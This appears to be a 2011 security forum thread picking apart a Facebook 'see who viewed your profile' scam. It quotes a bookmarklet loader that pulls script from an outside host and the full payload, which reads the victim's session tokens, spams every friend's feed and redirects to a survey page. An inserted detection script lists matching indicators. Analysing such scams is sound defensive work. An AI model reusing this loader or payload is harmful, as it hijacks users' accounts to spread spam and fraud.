Thread: what does this code mean

  1. #1
    AO's MMA Fanatic! Computernerd22's Avatar
    Join Date
    Mar 2003
    Location
    Miami, FL
    Posts
    795

    what does this code mean

    There is a JavaScript code going around Facebook and I am curious as to what it does. They give an example, but it didn't work. Also, I don't want to run any old code on this machine. Thank you, Mike

    Code:
    javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://bdatero.info/y.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();
    I am not a coder but a network guy; all help is greatly appreciated.

    Here is the URL: http://tadero.info/engl.php

  2. #2
    Senior Member
    Join Date
    Apr 2005
    Location
    USA
    Posts
    422
    it's getting its source from here:
    'http://bdatero.info/y.js?'+(Math.random())
    and doesn't have any actual code in itself other than referring to the source on that website. My guess is that the Math.random() is used in the URL to make it harder for Firefox and other websites to warn that it's unsafe? I'm not sure though, as they could just set the whole domain as 'unsafe' to produce the warning. It looks sketchy to me. I went to the link directly in my browser, so as not to run the script.

    var message = "Awesome! A new way to see your profile's full stats. I just checked how many people have viewed my profile and how much time I spent on FB this month . Scan your profile and let me know how popular YOU are.";
    var jsText = "http://tdadero.info/gop.php";
    var myText = "Scan Profile";

    var post_form_id = document.getElementsByName('post_form_id')[0].value;
    var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
    var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

    var friends = new Array();
    gf = new XMLHttpRequest();
    gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
    gf.send();
    if(gf.readyState!=4){ }else{
    data = eval('(' + gf.responseText.substr(9) + ')');
    if(data.error){ }else{
    friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
    }
    }
    for(var i=0; i<friends.length; i++){
    var httpwp = new XMLHttpRequest();
    var urlwp = "/fbml/ajax/prompt_feed.php?__a=1";
    var paramswp = "&__d=1&app_id=6261817190&extern=1&" +
    "&post_form_id=" + post_form_id +
    "&fb_dtsg=" + fb_dtsg +
    "&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) +
    "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) +
    "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +
    "&user_message=" + message;
    httpwp.open("POST", urlwp, true);
    httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    httpwp.setRequestHeader("Content-length", paramswp.length);
    httpwp.setRequestHeader("Connection", "keep-alive");
    httpwp.onreadystatechange = function(){
    if (httpwp.readyState == 4 && httpwp.status == 200){

    }
    }
    httpwp.send(paramswp);
    }


    alert("Account verification failed. Please proceed to next step to verify your account.");
    window.location = "http://basopu.info/poli/indexen.php"
    I'm not very experienced with POST and AJAX, but my guess is this posts a message to Facebook under your ID, and then sends you to this page
    saying that you couldn't verify your account. This page then asks you to complete a survey, which may be the point of this script as a whole, but there may be other things going on at that site as well, as I never took the time to get past the survey popup to see what else the website had in store.
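    An added example (not code from the thread or from any of the posters): a small static triage of pasted "javascript:" bookmarklets, so you can see why a snippet is suspicious without running it. The indicator list is an assumption drawn from the loader and payload discussed above, not an exhaustive detector; the payload sample is a constructed, non-working stub.

```javascript
// Indicators matching the two stages discussed in this thread: a remote
// loader with a cache-busting URL, then a payload that harvests session
// tokens, mass-posts with the victim's session and redirects to a survey.
const INDICATORS = [
  { name: 'remoteScriptLoad', re: /createElement\(\s*['"]script['"]\s*\)/,
    why: 'injects a <script> element, so the real code lives on another host' },
  { name: 'cacheBuster', re: /\.src\s*=\s*[^;]*Math\.random\(\)/,
    why: 'random query string defeats caching and simple URL blocklists' },
  { name: 'dynamicEval', re: /\beval\s*\(/,
    why: 'evaluates server-returned text as code' },
  { name: 'sessionTokenHarvest', re: /fb_dtsg|post_form_id|c_user=/,
    why: "reads the logged-in user's CSRF token / user id" },
  { name: 'massPost', re: /XMLHttpRequest[\s\S]*\.open\(\s*["']POST["']/,
    why: "sends POST requests with the victim's own session (self-XSS spam)" },
  { name: 'redirect', re: /window\.location\s*=/,
    why: 'sends the victim on, typically to a survey or phishing page' },
];

// Pull every host named in the snippet so it can be checked or blocked.
function extractHosts(code) {
  const hosts = new Set();
  for (const m of code.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

function triageBookmarklet(code) {
  const src = code.trim();
  const hits = INDICATORS.filter((ind) => ind.re.test(src));
  const names = hits.map((h) => h.name);
  let verdict = 'benign-looking';
  if (['remoteScriptLoad', 'sessionTokenHarvest', 'massPost'].some((n) => names.includes(n))) {
    verdict = 'malicious';
  } else if (hits.length) {
    verdict = 'suspicious';
  }
  return { isBookmarklet: /^javascript:/i.test(src), hosts: extractHosts(src),
           indicators: names, reasons: hits.map((h) => h.why), verdict };
}

// Sample 1: the loader from post #1, copied as text (never executed here).
const LOADER = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://bdatero.info/y.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";
// Sample 2: constructed stub with the payload's indicators but none of its working logic.
const PAYLOAD_STUB = "var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var h=new XMLHttpRequest();h.open('POST','/fbml/ajax/prompt_feed.php',true);window.location='http://example.invalid/survey';";
// Sample 3: constructed, abbreviated version of the harmless image-spinner bookmarklet.
const SPINNER = "javascript:R=0;DI=document.getElementsByTagName('img');function A(){for(i=0;i<DI.length;i++){DI[i].style.position='absolute'}R++}setInterval('A()',50);void(0)";

console.log(triageBookmarklet(LOADER));      // verdict: 'malicious', hosts: ['bdatero.info']
console.log(triageBookmarklet(PAYLOAD_STUB)); // verdict: 'malicious'
console.log(triageBookmarklet(SPINNER));     // verdict: 'benign-looking'
```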

  3. #3
    HYBR|D
    Guest
    Optional extra :halo:
    javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',50); void(0)

  4. #4
    HYBR|D
    Guest
    I've got the actual source for this .js XSS; I've attached a .txt file that contains both parts of the 0-day that was being used.

    This has since been patched by FaceBook, so it's pretty harmless atm.
    Last edited by HYBR|D; October 14th, 2011 at 04:32 AM.

  5. #5
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    It's one of those supposedly "stalker" apps that will allow you to see who's been watching your profile.

    NONE of those scripts work because FB doesn't expose that data.

    http://arstechnica.com/web/news/2011...avoid-them.ars
    Oliver's Law:
    Experience is something you don't get until just after you need it.
